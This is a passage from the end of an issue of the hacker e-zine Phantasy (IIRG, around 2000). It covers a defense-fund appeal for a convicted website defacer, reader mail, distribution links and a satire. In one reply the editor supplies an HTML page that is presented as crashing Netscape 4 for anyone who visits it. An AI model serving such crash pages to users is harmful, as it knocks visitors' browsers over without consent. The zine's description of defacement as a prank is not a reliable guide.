flown up to Canada on several occasions simply to attend the occasional short
bail-hearing or pre-trial motion. Everyone was flown up to Canada again for
the sentencing hearing, despite their presence not being required. Who ends
up paying for all of this air-travel and accommodation? The Canadian taxpayer,
in the end. Unfortunately, this never came to light during any of the
reporting on Jason's case. Even though Jason eventually plea bargained and
managed to avoid the huge fine and long jail term that he was threatened with,
we still have to ask ourselves whether someone should be imprisoned for what
was essentially no more than a prank. Can we continue to allow corporations
and government agencies to arbitrarily pick numbers out of the air when
accounting for "damages" that occurred as a result of a mere web-page
defacement?
The Trout Defense Fund
.a@&$$$ .a@&$&@a. .a&$$$$ .a&$$$$ .a@&$$$ .a$$$a. .a@&$$$ a$$ $$a
$$$$$$$ $$$' `$$$ $$$$$$$ $$$$$$$ $$$$$$$ $$$$$$$ $$$$$$$ $$$ $$$
$$$ $$$. .a&$' $$$' $$$' $$$ `$$$$$' $$$$. $$$ $$$
$$$$$$ $$$$$$$' $$$$$a $$$$$a THE $$$$$$ .aaaaa. `$$$$a. $$$$$$$$
$$$ $$$ `$$a. $$$. $$$. $$$ $$$$$$$ `$$$$ $$$ $$$
$$$ $$$ `$$$a. $$$$$$$ $$$$$$$ $$$ $$$$$$$ $$$$$$$ $$$ $$$
$$$ $$$ `$$$' `$$$$$$ `$$$$$$ $$$ `$$$$$' "$$$$$" $$$ $$$
Defense Fund
Jason Mewhiney has been financially ruined by the events surrounding his
trial and incarceration. Jason's mother is bearing the brunt of the burden,
facing thousands of dollars in Lawyer fees while Jason sits in prison. In
addition to the debt incurred by the trial, Jason will have to deal with the
six-thousand dollar fine he has been ordered to pay to NASA. Without any
means of income, and more than likely no chance of gainful employment, this
case is likely to haunt him financially for years to come.
A Defense fund has been set up to help ease the burden placed on Jason and
his family. If you care to donate, please send either a check or money order to:
The Trout Defense Fund
2527 Farmcrest Dr. #404
Herndon, VA 20171
USA
Any amount is greatly appreciated. We are currently working on setting up a
dedicated account for the fund so that money can be directly transferred. Any
moneys received will go directly to help cover Jason's legal bills. If you
can't afford to donate, then why not take the time to write Jason a letter or
send him some reading material? Anything sent to the defense fund will be
forwarded to either Jason or his mother directly.
Thank you for your support.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [10]: Letters to the IIRG
(Fan Mail, Hate Mail, Letter Bombs)
<iirg@iirg.org>
I receive so many letters and requests that it would be impossible to
post all letters received. However, every now and than I get one that
makes me laugh or vomit uncontrollably. I offer these to you.....
------------------------------------------------------------------------------
1. I have a question about Phantasy Magazine...
From: Pegasi17@aol.com
Delivered-To: iirg@iirg.org
Date: Sat, 10 Jul 1999 03:59:06 EDT
Subject: I have a question about Phantasy Magazine...
To: iirg@iirg.org
Is Phantasy Magazine going to be continued or was the issue 22 the last issue
that will be made? Thank you much...
---- Pegasi17
IIRG - Well the last issue was #23, and No... We are publishing again.
-------------------------------------------------------------------------------
2. Inquiry?
Delivered-To: iirg@iirg.org
Date: Sun, 25 Jul 1999 23:16:36 -0700
From: Erik Bos <Genevaroth@yahoo.com>
To: iirg@iirg.org
Subject: inquiry
I am looking for schematics for the following:
ELF generator microwave weapon
if in any back issues there is anything like this pls. email me with
ordering info.
Thank you
Erik Bos
IIRG - Sorry, but the technology to Microwave Elves has been patented
and kept strictly confidential by the Keebler Corporation.
Might I suggest you try a toaster oven instead?
-------------------------------------------------------------------------------
3. Are You for Hire?
From: "Marie Estes" <sophistry7@hotmail.com>
To: iirg@iirg.org
Date: Sun, 24 Oct 1999 21:23:43 GMT
I'm enjoying your prose on your website.
I, however, am not one of your kind. I admire your exploits and ambition.
I require your services and do not have the knowledge or expertise, nor
temporal resources to do the job myself. Perhaps you might consider an
innocuous mercenary act?
You ARE for hire, aren't you?
RSVP.
IIRG - What did you have in mind Marie? And does it involve chocolate
syrup and whip cream?
-------------------------------------------------------------------------------
4. Info?
From: "DK" <ww7@locl.net>
To: <iirg@iirg.org>
Subject: info
Date: Sat, 25 Dec 1999 17:57:34 -0500
Hi
I am looking for the code that will allow a webpage to reboot the
viewer computer. Do you have or know any info that will help me find this
coding?
syburcat
IIRG - Try putting this on your page to Crash Netscape 4
=============================
<html>
<head>
<title>Smash Netscape</title>
<body bgcolor="#000000" text="#ffffff">
<br>
<font face="Arial, Helvetica, Geneva">
<center>
<font size="5" color="#777777"><b>Smash Netscape</b></font><br>
<br>
This page will crash Netscape Communicator 4!
</center>
</font>
<div id="smashItDiv" style="position: absolute; left: 160px; top: 175px;
width: 264px; high: 150px; z-index: 50; visibility: visible;">
<table border="0" cellspacing="0" cellpadding="0" width="264">
<tr>
<td align="center" valign="middle">
<form name="smashItForm">
<img name="NSCrashImg" src="X.gif" border="0">
<br>
<font face="Arial, Helvetica" size="2">Crash Netscape</font><br>
<input name="askjdfh" type="input" size="20" maxlength="100"><br>
</font>
</form>
</td>
</tr>
</table>
</div>
<br>
</body>
</html>
==================================
-----------------------------------------------------------------------------
5. You Evil Hacker Survivalists You!!!
Date: Thu, 02 Mar 2000 22:36:13 -0600
From: Richard Reed <sanders4@knightsnet.com>
To: ticom@iirg.org
Hi yes I think this page is a threat to our country therefore I have
forwarded a copy of this page and a link to various government agencies.
http://www.iirg.org/~ticom/survival.html
TICOM - The only thing the Connecticut Survivalist Alliance Page is a
threat to are totalitarians, socialists, close-minded idiots, and
other such scum who despise the Bill of Rights. Since you are
apparently one of those types you have my permission to go frolic
in conjunction with yourself.
My guess is that you are a terrorist, child molester, rapist, or
serial killer who does not wish his potential victims armed with
knowledge that they may use to defend themselves and maintain their
self-reliance and determination.
If not, then you are simply an idiot.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [12]: Phantasy Distribution Site
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Phantasy Distribution Sites
Phantasy's Distribution Site's are continually changing, we apologize if you
visit a site and it's not there. But always go to our main site and it will
be there.
1. The IIRG's Main Phantasy Distro Site
http://www.iirg.org/phantasy.html
2. L0pht's Phantasy Magazine Archive
http://www.l0pht.com/%7Eoblivion/IIRG.html
3. EFF "Phantasy" Archive
http://www.eff.org/pub/Publications/CuD/Phantasy/index.html
If you'd like to set-up a Phantasy Distro site and be listed here and
on the IIRG's link page, e-mail Mercenary at iirg@iirg.org
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Section [13] Articles We Never Want to See
This Month - @MISTAKE PC Busters
Forget about those nasty viruses and malicious hackers; the real threat
to your PC is far more insidious. Your home computer may be host to a
demon from Hell. You and your family may well come under its malevolent
control.
"While the Computer Age has ushered in many advances, it has also opened yet
another door through which Lucifer and his minions can enter and corrupt
men's souls," says Reverend Jim Peasboro, author of the upcoming book,
The Devil in the Machine.
That why the trained "White Hat Hackers" at the IIRG's
@MISTAKE Corporation are coming to your aid. The IIRG's world renowned
staff of trained demon killing Mercenaries will rid your PC of the nastiest
spawns of Satan.
Listen to these testimonials:
"My wife who had never expressed an impure thought in her life was entering
Internet chat rooms and found herself spewing foul, debasing language that
she would never use normally" The IIRG came in with battle axes and completely
destroyed her system. It was the best display of Information Warfare that
I have ever seen."
Winn Schwartau
"My programs began talking directly to me, openly mocking me.
It typed out, John, you are a liar and your book sucks.'"
Then the printer went haywire and started printing out what looked like
gobbledygook. I later had a college professor examine the text.
He told me it was an ancient language and to contact the IIRG.
It finally turned out to be a stream of obscenities written in a
2,800-year-old Mesopotamian dialect! Thank god the IIRG knows how
translate ancient Mesopotamian."
John Markoff
The Reverend advises anyone suspecting that their computer is possessed to
consult a clergyman, or, if that fails - contact the IIRG and the @MISTAKE
Corporation.
Their skilled Technicians can replace your hard drive and reinstall your
software, getting rid of the wicked spirit permanently and installing
numerous monitoring and backdoor programs on your system.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
PHANTASY(C) IIRG 1991 - 2000
May Odin Guide Your Way!
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
May You Be Feasting and Drinking in Valhalla For a Full Night
Before the Christian God Knows You're Dead
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
